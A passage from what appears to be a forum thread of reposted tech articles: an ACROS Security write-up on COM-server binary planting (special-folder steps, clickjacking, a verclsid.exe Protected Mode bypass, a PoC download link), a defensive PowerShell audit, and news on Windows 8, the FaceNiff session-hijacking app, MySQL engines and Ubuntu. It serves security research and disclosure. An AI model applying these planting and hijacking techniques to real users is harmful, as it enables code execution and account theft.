create a new PDF document;
create a new folder and rename it to files.{2E095DD0-AF56-47E4-A099-EAC038DECC24} - note that Windows 7 also hides the folder extension, and that this special folder still behaves like an ordinary folder;
copy all four data files and the "malicious" DLL to the new folder;
open the folder;
double-click the Word document; (causing Word 2010 to execute the "malicious" ehTrace.dll)
double-click the PowerPoint document; (causing PowerPoint 2010 to execute the "malicious" ehTrace.dll)
double-click the PDF document; (causing Nitro PDF Reader to execute the "malicious" ehTrace.dll)
double-click the text document; (launching Notepad but not immediately executing the "malicious" DLL)
selecting "File -> Save As" from the menu in Notepad. (causing Notepad to execute the "malicious" ehTrace.dll)

http://www.youtube.com/watch?feature=player_embedded&v=H82gaZizl-0

Similarly to the Wordpad exploit on Windows XP, the above exploits are based on the curious and heavily undocumented nature of special folders, which makes otherwise innocent applications instantiate chosen COM servers. Thus Word, PowerPoint and Nitro PDF Reader (and many other applications) all try to instantiate the "AnalogCable Class" COM server while having their current working directory set to our special folder. This results in a search for ehTrace.dll, and in the loading of "malicious" ehTrace.dll from our special folder. The final target, Notepad, does not get hacked simply by opening a file - but does execute the "malicious" DLL when the "Save As" dialog is opened. Apparently Notepad does not automatically trigger the COM server instantiation when a document is loaded, but opening the "Save As" dialog causes the code behind this dialog to interact with the special folder, thus instantiating the appropriate COM server.

Leveraging COM Server Exploits Through Web Browsers

Skeptics among you may say that, okay, this opens up new attack vectors for various binary planting vulnerabilities, but the user would still have to double-click a document on a remote share. And users wouldn't do that, would they? (Of course they would but let's pretend they wouldn't.) So in order to satisfy the most demanding among you, we leveraged the above exploits through web browsers, resulting in some pretty user-friendly scenarios, in a manner of speaking. Let's start with Windows XP and Internet Explorer 8.

Web Attack 1: Internet Explorer 8 on Windows XP

The following video shows how a user would experience the attack. Visiting a malicious web site, clicking once on one link, and again on another, is enough to get a remote binary executed on his computer.
http://www.youtube.com/watch?v=uU3KVsO8Ca4&feature=player_embedded Two tricks are employed in the background of this attack. The first is aimed at launching applications without double-clicking. One of the methods we found for this makes use of the default Windows XP Task View, i.e., the task list shown in Windows Explorer on the left of each folder view. When a printable document is selected in the folder, this task list includes the "Print this file" link which, when (single-) clicked upon, launches the application associated with the file type of the selected file and instructs it to initiate the printing process. The procedure is thus: 1) click the file in a remote special folder to select it, and 2) click "Print to file" to launch the application which then loads a malicious DLL. The second trick is clickjacking. This old trick is simply used for hiding the actual attack inside a 1x1 iframe such that wherever the user clicks on the web page the first time (anywhere on the page, not only on links), he actually clicks inside this tiny iframe - precisely on the Wordpad document shown in a remote shared folder, thereby selecting this document. The iframe then repositions its remote content such that when the user clicks again, he actually clicks on the "Print this file" link in the same remote shared folder as before, thereby launching Wordpad and executing the malicious DLL inside it. Now, since most attackers want to hide their attacks as much as possible, we made the demo such that when the user clicks inside the tiny iframe, we detect that and simulate the click on the underlying web page as well, which is why the links apparently clicked on actually respond to the clicks. For those of you preferring the schematic diagrams, here's how it works in the language of objects, arrows and annotations (taken from our Hack In The Box slides). 
Web Attack 2: Internet Explorer 9 on Windows 7 With Protected Mode

We've already seen that applications can be made vulnerable through unsafe COM servers on Windows 7 just like on Windows XP. But there are two additional challenges here. First, Windows 7 doesn't have the task view that Windows XP does, so another way to avoid double-clicking had to be found. And second, you can't just launch any application from IE when in protected mode without popping up the yellow security warning.

For the first challenge we chose to reveal a "right-click, send to compressed (zipped) folder" trick. IE allows the user to right-click a folder inside a remote shared folder (without a warning), and then select "send to" and "compressed (zipped) folder" from the context menu. This triggers a process of compression, which sets the current working directory of IE to the remote shared folder - and completes the first part of the attack.

The second challenge was overcome with the help of verclsid.exe. This curious little executable, mostly unknown to users, gets frequently launched in the background and quickly terminates without any visible effect. Verclsid.exe is, ironically, a security measure introduced by a Windows security update associated with bulletin MS06-015, but to us it is interesting because it is "whitelisted" for the IE protected mode: when IE launches a new verclsid.exe process, the user doesn't have to okay a security warning. Furthermore, verclsid.exe instantiates the COM server associated with the extension of a chosen special folder, providing just the binary planting opportunity we need. In our attack, we trigger the launching of verclsid.exe by loading a number of different special folders in an additional 1x1 iframe while IE has its current working directory set to our remote shared folder. Since verclsid.exe is launched by IE, it also inherits IE's current working directory (which hosts our "malicious" DLL) and eventually loads our DLL.
The attack is again hidden with clickjacking. Let's see how the user experiences this attack. Visiting a malicious web site, right-clicking anywhere on the page and selecting "send to" and "compressed (zipped) folder" from the context menu is enough to get a remote binary executed on his computer.

http://www.youtube.com/watch?v=dydN_KhQnhs&feature=player_embedded

Again, the schematic diagram of the attack:

Lessons Learned

The main takeaway from our presentation was that binary planting, as a conceptual problem with loading binaries on Windows, is not at all a trivial problem if you really understand the numerous details and hidden processes that affect and enable it. By shedding light on a few previously unknown attack vectors we only revealed a small portion of our advanced binary planting research, which is aimed at improving the exploitation of various binary planting vulnerabilities. If we want to convince developers to fix security defects, we need to show them that they're easy to exploit, and we hope to see some proactive effort as a result of our work. And this is by no means aimed towards Microsoft alone; it was simply easiest for us to use the components that come with Windows, but we found a large number of other vendors' products to be exploitable in the ways described above.

How To Protect Yourself?

Apart from our generic recommendations for administrators, a couple of additional temporary measures will protect you from the attacks described in this post (but unfortunately not from numerous similar attacks):

On Windows XP, delete the {42071714-76d4-11d1-8b24-00a0c9068ff3} registry key under HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID.
On Windows 7, copy ehTrace.dll from C:\Windows\ehome to the System32 folder.

What's next?

We'll continue to raise awareness of this vulnerability class we call binary planting. There's a lot of misunderstanding about it among developers as well as security researchers, and we'll do our best to change that.
Our first humble milestone is to stop seeing new product versions making unsafe LoadLibrary calls. Unfortunately, we don't seem to be anywhere close to that.

(Again, most of the above research has been done by Luka Treiber, security researcher at ACROS Security.)

COM Server-Based Binary Planting Proof Of Concept Released

For educational purposes we decided to publish a proof of concept (PoC) for the COM Server-Based Binary Planting attacks described in our previous post. We prepared both online and offline versions for 32-bit Windows XP running Internet Explorer 8.

Visit XP 2-click Binary Planting PoC and follow the instructions. You must have WebDAV communication with the Internet enabled and must not have the CWDIllegalInDllSearch hotfix installed.

Offline Proof of Concept

Download a ZIP archive of the PoC here, extract it and follow the instructions in readme.txt. You can test the PoC either from a local network share or locally on a single Windows XP machine.

Note that this is a proof of concept only, not a weaponized exploit. The reliability thus depends on a few factors:

You have to be running Internet Explorer 8 on 32-bit Windows XP (although it probably works on IE 7 too). A weaponized exploit could automatically detect the user's Windows and IE version and provide an exploit for 32-bit and 64-bit XP, Vista or Windows 7 accordingly.
You have to have "Show common tasks in folders" selected under the "Folder options" in Windows Explorer. (This is the default setting.) A weaponized exploit could use various attack vectors for different user configurations.
The automatic COM Server launching process in relation with special folders is largely undocumented and can be unpredictable. A weaponized exploit could initiate various special folders-related activities for further improving the reliability.
The SMB-to-WebDAV fallback takes a while (usually 10-15 seconds in our tests) and our PoC requires you to wait. A weaponized exploit could initiate this communication in the background while the user was reading an interesting text from the web page.

PoC: http://www.binaryplanting.com/demo/XP_2-click/XP_2-click.zip

Surse:
ACROS Security Blog: The Anatomy of COM Server-Based Binary Planting Exploits
COM Server-Based Binary Planting Proof Of Concept Released | HITBSecNews
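A defender-side check for the two temporary measures the post lists (added here; this is not ACROS Security's code or the PoC). It reports whether the XP "Display Panning CPL Extension" CLSID is still registered with an InprocServer32 DLL that does not resolve on disk, and whether ehTrace.dll is reachable from System32 on Windows 7; the -Apply switch and the Test-InprocServerDll helper are this script's own assumptions, and both fixes are exactly the ones the post describes.

```powershell
# Added example, not from the ACROS post: audit (and optionally apply) the two
# temporary mitigations described above. Run from an elevated PowerShell.
[CmdletBinding()]
param([switch]$Apply)   # assumption: without -Apply the script only reports

# CLSID and DLL names come from the post; the paths are this script's assumptions.
$XpClsid  = '{42071714-76d4-11d1-8b24-00a0c9068ff3}'   # Display Panning CPL Extension
$ClsidKey = "HKLM:\SOFTWARE\Classes\CLSID\$XpClsid"
$EhomeDll = Join-Path $env:windir 'ehome\ehTrace.dll'
$Sys32Dll = Join-Path $env:windir 'System32\ehTrace.dll'

function Test-InprocServerDll {
    # $true when the CLSID's InprocServer32 default value names a DLL that exists at a
    # full path; $false if the key is absent, the value is empty, the path is relative
    # (resolved through the DLL search order, i.e. the planting condition) or the file
    # is missing, which is what made deskpan.dll loadable from the working directory.
    param([string]$Key)
    $inproc = Join-Path $Key 'InprocServer32'
    if (-not (Test-Path -LiteralPath $inproc)) { return $false }
    $dll = (Get-ItemProperty -LiteralPath $inproc).'(default)'
    if ([string]::IsNullOrWhiteSpace($dll)) { return $false }
    $dll = [Environment]::ExpandEnvironmentVariables($dll)
    if (-not [IO.Path]::IsPathRooted($dll)) { return $false }
    return (Test-Path -LiteralPath $dll -PathType Leaf)
}

# --- Windows XP measure: delete the orphaned CLSID key ---
if (Test-Path -LiteralPath $ClsidKey) {
    if (Test-InprocServerDll -Key $ClsidKey) {
        Write-Output "$XpClsid is registered and its DLL resolves; nothing to change."
    } elseif ($Apply) {
        Remove-Item -LiteralPath $ClsidKey -Recurse -Force
        Write-Output "$XpClsid removed (its DLL did not resolve on disk)."
    } else {
        Write-Warning "$XpClsid is registered but its DLL does not resolve (unsafely registered COM server)."
    }
} else {
    Write-Output "$XpClsid is not registered."
}

# --- Windows 7 measure: make ehTrace.dll findable from outside C:\Windows\ehome ---
if (Test-Path -LiteralPath $Sys32Dll -PathType Leaf) {
    Write-Output "ehTrace.dll already present in System32."
} elseif (Test-Path -LiteralPath $EhomeDll -PathType Leaf) {
    if ($Apply) {
        Copy-Item -LiteralPath $EhomeDll -Destination $Sys32Dll
        Write-Output "ehTrace.dll copied from ehome to System32."
    } else {
        Write-Warning "ehTrace.dll exists only in ehome; PsisDecd.dll's LoadLibrary call falls through to the working directory."
    }
} else {
    Write-Output "ehTrace.dll not found in ehome; the Windows 7 component is not installed here."
}
```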
21. Previewing "Windows 8"

Article by Julie Larson-Green, corporate vice president, Windows Experience.

REDMOND, Wash. – June 1, 2011 – Today, at the D9 Conference, we demonstrated the next generation of Windows, internally code-named “Windows 8,” for the first time. Windows 8 is a reimagining of Windows, from the chip to the interface. A Windows 8-based PC is really a new kind of device, one that scales from touch-only small screens through to large screens, with or without a keyboard and mouse.

The demo showed some of the ways we’ve reimagined the interface for a new generation of touch-centric hardware. Fast, fluid and dynamic, the experience has been transformed while keeping the power, flexibility and connectivity of Windows intact. Here are a few aspects of the new interface we showed today:

Fast launching of apps from a tile-based Start screen, which replaces the Windows Start menu with a customizable, scalable full-screen view of apps.
Live tiles with notifications, showing always up-to-date information from your apps.
Fluid, natural switching between running apps.
Convenient ability to snap and resize an app to the side of the screen, so you can really multitask using the capabilities of Windows.
Web-connected and Web-powered apps built using HTML5 and JavaScript that have access to the full power of the PC.
Fully touch-optimized browsing, with all the power of hardware-accelerated Internet Explorer 10.

We also showed effortless movement between existing Windows programs and new Windows 8 apps. The full capabilities of Windows continue to be available to you, including the Windows Explorer and Desktop, as does compatibility with all Windows 7 logo PCs, software and peripherals. Although the new user interface is designed and optimized for touch, it works equally well with a mouse and keyboard. Our approach means no compromises — you get to use whatever kind of device you prefer, with peripherals you choose, to run the apps you love.
This is sure to inspire a new generation of hardware and software development, improving the experience for PC users around the world. Today, we also talked a bit about how developers will build apps for the new system. Windows 8 apps use the power of HTML5, tapping into the native capabilities of Windows using standard JavaScript and HTML to deliver new kinds of experiences. These new Windows 8 apps are full-screen and touch-optimized, and they easily integrate with the capabilities of the new Windows user interface. There’s much more to the platform, capabilities and tools than we showed today. We are excited to bring an innovative new platform and tools to developers and see how their creativity jumpstarts a new generation of apps. Windows 8 apps can use a broad set of new libraries and controls, designed for fluid interaction and seamless connectivity. Apps can add new capabilities to Windows and to other apps, connecting with one another through the new interface. For example, we showed today how a developer can extend the file picker control to enable picking from their own app content or from within another Windows 8 app, in addition to the local file system and the network. We’re just getting started. And this isn’t just about touch PCs. The new Windows experience will ultimately be powered by application and device developers around the world — one experience across a tremendous variety of PCs. The user interface and new apps will work with or without a keyboard and mouse on a broad range of screen sizes and pixel densities, from small slates to laptops, desktops, all-in-ones, and even classroom-sized displays. Hundreds of millions of PCs will run the new Windows 8 user interface. This breadth of hardware choice is unique to Windows and central to how we see Windows evolving. The video below introduces a few of the basic elements of the new user interface. Although we have much more to reveal at our developer event, BUILD (Sept. 
13 - 16 in Anaheim, Calif.), we’re excited to share our progress with you. Today’s demonstration followed our announcements earlier this year about Windows 8 running on System on a Chip (SoC) processors, and our browser engine innovations and significantly increased standards support in Internet Explorer 10. Windows 8 extends these innovations and reimagines every level of the Windows architecture — the kernel, networking, storage, devices, user interface — all building on the broadest and richest ecosystem of software, peripherals and devices. We have so much more on the way! We’re working very hard to get the product ready for early testing, and we plan to kick off our engineering dialogue through our team blog, just as we did for Windows 7. So please stay tuned — we have a lot of cool innovation coming in the months ahead. By Julie Larson-Green Corporate Vice President, Windows Experience Video: Download video: http://media.ch9.ms/ch9/cda16b03-c463-47e7-b604-9ef5011c5b25/Demo.mp4 Sursa: http://www.microsoft.com/presspass/features/2011/jun11/06-01corporatenews.aspx
  22. Sniff and intercept web session profiles on Android

02 June 2011.

FaceNiff is an Android app that allows you to sniff and intercept web session profiles over the Wi-Fi that your mobile is connected to. It is possible to hijack sessions only when Wi-Fi is not using EAP, but it should work over any private networks (Open/WEP/WPA-PSK/WPA2-PSK). It's kind of like Firesheep for Android, and it works on WPA2. A rooted phone is required, and keep in mind that if the user uses SSL this application won't work.

Supported services:
FaceBook
Twitter
Youtube
Amazon
Nasza-Klasa

Here's a video of FaceNiff for Android in action on LG Swift 2X:

Confirmed to work on:
HTC Desire CM7
Original Droid/Milestone CM7
SE Xperia X10
Samsung Galaxy S
Nexus 1 CM7
HTC HD2
LG Swift 2X
LG Optimus Black - original rom
LG Optimus 3D - original rom
Samsung Infuse

Download: http://faceniff.ponury.net/

Source: Sniff and intercept web session profiles on Android
  23. Difference between InnoDB and MyISAM in MySQL

Posted by Sachin Khosla, on November 15, 2010

MyISAM and InnoDB are the two most commonly used storage engines of the MySQL database. However, MyISAM is the default storage engine chosen by the MySQL database when creating a new table. The major differences between these two storage engines are:

InnoDB supports transactions, which is not supported by tables which use the MyISAM storage engine.
InnoDB has row-level locking and relational integrity, i.e. it supports foreign keys, which is not possible in MyISAM.
InnoDB's performance for high volume data cannot be beaten by any other storage engines available.
Tables created in MyISAM are known to have higher speed compared to tables in InnoDB. But since InnoDB supports volume, transactions and integrity, it's always a better option when you are dealing with a larger database.

It is worth mentioning that a single database can have tables of different storage engines.

File structure

MyISAM stores each table on disk with three files whose names begin with the same as the table name. These files have different extensions to differentiate their purpose. A .frm file stores the table format, and a .MYD (MYData) file stores the data of the table. If the table has indexes then these are stored in the .MYI (MYIndex) file.

On the other hand, InnoDB tables and their indexes are stored in the tablespace, which consists of several files. That is why InnoDB tables can be very large and can store a large volume of data. The InnoDB storage engine maintains its own buffer pool for caching data and indexes in main memory.

Check the engines being used for existing tables

So these are the main differences between these two engines. You can specify in the query which engine is to be used while creating the table.

    CREATE TABLE test (name VARCHAR(30)) ENGINE = InnoDB;

Since MyISAM is the default engine assigned when creating a table, you need not specify it if you are planning to use MyISAM. This rule holds good if you have not changed anything in the configuration.

To check the engines of already existing tables, use the following query. It will list all the existing tables which are present in the current database, with their engines specified.

    SHOW TABLE STATUS;

If you want to view the status of a particular table, then use the following query:

    SHOW TABLE STATUS WHERE Name = 'tablename';

Hope that helps. Stay Digified !!

Sachin Khosla

Source: DigiMantra » Difference between InnoDB and MyISAM in MySQL
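The integrity differences the post lists (foreign keys, transactions, how to check the engine) shown side by side, as an added example that is not part of the original post; it assumes a MySQL server and a scratch database, and the table names are constructed.

```sql
-- Added example (not from the original post): the same parent/child schema
-- built once per engine, to show the integrity differences the post lists.
-- Assumes a MySQL server and a scratch database; table names are constructed.

-- InnoDB: the foreign key is enforced and the whole transaction can be undone.
CREATE TABLE parent_innodb (id INT PRIMARY KEY) ENGINE = InnoDB;
CREATE TABLE child_innodb (
  id        INT PRIMARY KEY,
  parent_id INT NOT NULL,
  FOREIGN KEY (parent_id) REFERENCES parent_innodb (id)
) ENGINE = InnoDB;

START TRANSACTION;
INSERT INTO parent_innodb VALUES (1);
INSERT INTO child_innodb  VALUES (10, 1);   -- accepted: parent 1 exists
INSERT INTO child_innodb  VALUES (11, 99);  -- rejected: ERROR 1452, no parent 99
ROLLBACK;                                    -- both tables are empty again
SELECT COUNT(*) FROM parent_innodb;          -- 0

-- MyISAM: the FOREIGN KEY clause is parsed but not stored, and there are
-- no transactions, so ROLLBACK cannot undo rows that were already written.
CREATE TABLE parent_myisam (id INT PRIMARY KEY) ENGINE = MyISAM;
CREATE TABLE child_myisam (
  id        INT PRIMARY KEY,
  parent_id INT NOT NULL,
  FOREIGN KEY (parent_id) REFERENCES parent_myisam (id)
) ENGINE = MyISAM;

START TRANSACTION;
INSERT INTO parent_myisam VALUES (1);
INSERT INTO child_myisam  VALUES (11, 99);  -- accepted: an orphan row, no parent 99
ROLLBACK;                                    -- warning 1196: non-transactional tables not rolled back
SELECT COUNT(*) FROM child_myisam;           -- 1: the orphan row is still there

-- Check which engine each table really uses: the post's SHOW TABLE STATUS,
-- or the equivalent information_schema query, which is easier to filter.
SHOW TABLE STATUS WHERE Name LIKE 'child_%';
SELECT TABLE_NAME, ENGINE
  FROM information_schema.TABLES
 WHERE TABLE_SCHEMA = DATABASE()
   AND ENGINE <> 'InnoDB';                   -- these tables have no FK or transaction guarantees
```

The last query is the practical check: any table it returns holds data that nothing in the database is enforcing referential integrity or atomicity for.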
  24. NoVirusThanks Anti-Rootkit Free

NoVirusThanks Anti-Rootkit is a sophisticated low-level system analysis tool whose main goal is to detect the presence of malware and rootkits. Hidden processes, hidden drivers, stealth DLL modules, code hooks etc. are just a few of the objects which can be detected in user space and system memory.

Quick Report Scan (Easy Mode)
Detect SSDT & Shadow SDT Hooks
Detect Interrupt Descriptor Table (IDT) Hooks
Detect SYSENTER Handler Hooks
Detect Stealth IRP Hooks
Analyze Master Boot Record (MBR)
Detect Kernel Callbacks
Detect Kernel-Mode & User-Mode Hooks
Detect Hidden Drivers + Hardcore Scan
Detect Hidden Processes
Processes Behavioral Analysis
Detect Windows Message Hooks
Hosts File Manager
Browser Helper Objects Manager
AppInit_DLLs Manager

NoVirusThanks Anti-Rootkit is a must-have for anyone seeking true 32-bit Windows NT kernel security and system threat analysis. The vast detection range of industry standard rootkits is truly amazing, especially without compromising system stability even in the most hostile, malware-plagued environments. This software is recommended for experienced users.

We offer a 1 license multi-user solution, meaning all you need is 1 license per PC and all users may access the software. NoVirusThanks Anti-Rootkit can be purchased for only $19.99 USD. The 1 PC license is lifetime; you do not need to renew the license each year for the version of the product you have bought, and we provide free updates for minor revisions. We also offer a free edition of our product, with some limitations in the features (view the comparison table above), that can be downloaded at the bottom of this page; the license is free for personal use only, and is not for business or commercial use.

NoVirusThanks Anti-Rootkit is compatible with the following 32-bit Microsoft Windows Operating Systems (OS): Windows XP, Windows Server 2003, Windows Vista and Windows 7

Preview: NoVirusThanks Anti-Rootkit (Preview) - Anti Rootkit and Anti Malware – Security Software and Services - NoVirusThanks

Video: Multiple Rootkit Infection Test

Download: http://downloads.novirusthanks.org/files/NVTArk_Free_Setup.exe

Source: NoVirusThanks Anti-Rootkit Free - Anti Rootkit and Anti Malware – Security Software and Services - NoVirusThanks
  25. Ubuntu 11.10 Alpha 1 Has GNOME 3, Firefox 5, Linux Kernel 2.6.39

We are proud to announce today, June 2nd, that the first Alpha version of the upcoming Ubuntu 11.10 (Oneiric Ocelot) operating system is now available for download. As usual, we've grabbed a copy of it in order to keep you up-to-date with the latest changes in the Ubuntu 11.10 development.

While all Ubuntu users are still discovering and enjoying the brand-new Ubuntu 11.04 (Natty Narwhal) operating system, somewhere deep in the Ubuntu headquarters, the Canonical developers are working on the next major update for their popular Linux distribution.

What's new in Ubuntu 11.10 Alpha 1?

Well, the big news is that the GNOME 3 desktop environment has finally been implemented in the Ubuntu operating system, so users can grab a copy of it and test it deeply. Just remember that it's a development release and not all things work as expected!

Also new in Ubuntu 11.10 (Oneiric Ocelot) is Linux kernel 2.6.39, which brings lots of new drivers and support for the latest hardware components. As you can see from the screenshot below, if you don't have 3D video drivers, Ubuntu 11.10 will fall back to Unity 2D.

The following packages are featured in Ubuntu 11.10: Mozilla Firefox 5 Beta, Transmission 2.13, NetworkManager 0.9, GNOME Orca 3.0, Nautilus 3.0.2, GTK3, GCC 4.6, and gsettings instead of gconf.

Ubuntu Server 11.10 Alpha 1 contains updated Orchestra elements and Openstack components. Also, the delta with Debian was reduced in many areas.

What's new in Kubuntu 11.10 Alpha 1?

Well, the first Alpha version of Kubuntu 11.10 is built on top of KDE Software Compilation 4.6.3. The Muon Software Center is now used by default for package management. KDE PIM 4.4.11 is also included in this release.

What's new in Xubuntu 11.10 Alpha 1?

Well, the first Alpha version of Xubuntu 11.10 features the beautiful Xfce 4.8 desktop environment. There are no significant changes in this release.

On October 13th, 2011, Ubuntu 11.10 (Oneiric Ocelot) will become the fifteenth release of the Ubuntu operating system. See you again in three months (June 30th), for the second Alpha version of the upcoming Ubuntu 11.10 (Oneiric Ocelot).

The Oneiric Ocelot Release Schedule:
June 2nd, 2011 - Alpha 1 release
June 30th, 2011 - Alpha 2 release
August 4th, 2011 - Alpha 3 release
September 1st, 2011 - Beta 1 release
September 22nd, 2011 - Beta 2 release
October 13th, 2011 - Final release of Ubuntu 11.10

Download Ubuntu 11.10 Alpha 1 (Oneiric Ocelot) right now from Softpedia.
Download Ubuntu Server 11.10 Alpha 1 (Oneiric Ocelot) right now from Softpedia.
Download Ubuntu Enterprise Cloud 11.10 Alpha 1 (Oneiric Ocelot) right now from Softpedia.
Download Kubuntu 11.10 Alpha 1 (Oneiric Ocelot) right now from Softpedia.
Download Xubuntu 11.10 Alpha 1 (Oneiric Ocelot) right now from Softpedia.
Download Edubuntu 11.10 Alpha 1 (Oneiric Ocelot) right now from Softpedia.

Remember that this is an alpha release and it should NOT be installed on production machines. It is intended to be used for testing purposes only. Please report bugs to the Ubuntu Bug Tracker.

Source: Ubuntu 11.10 Alpha 1 Has GNOME 3, Firefox 5, Linux Kernel 2.6.39 - Softpedia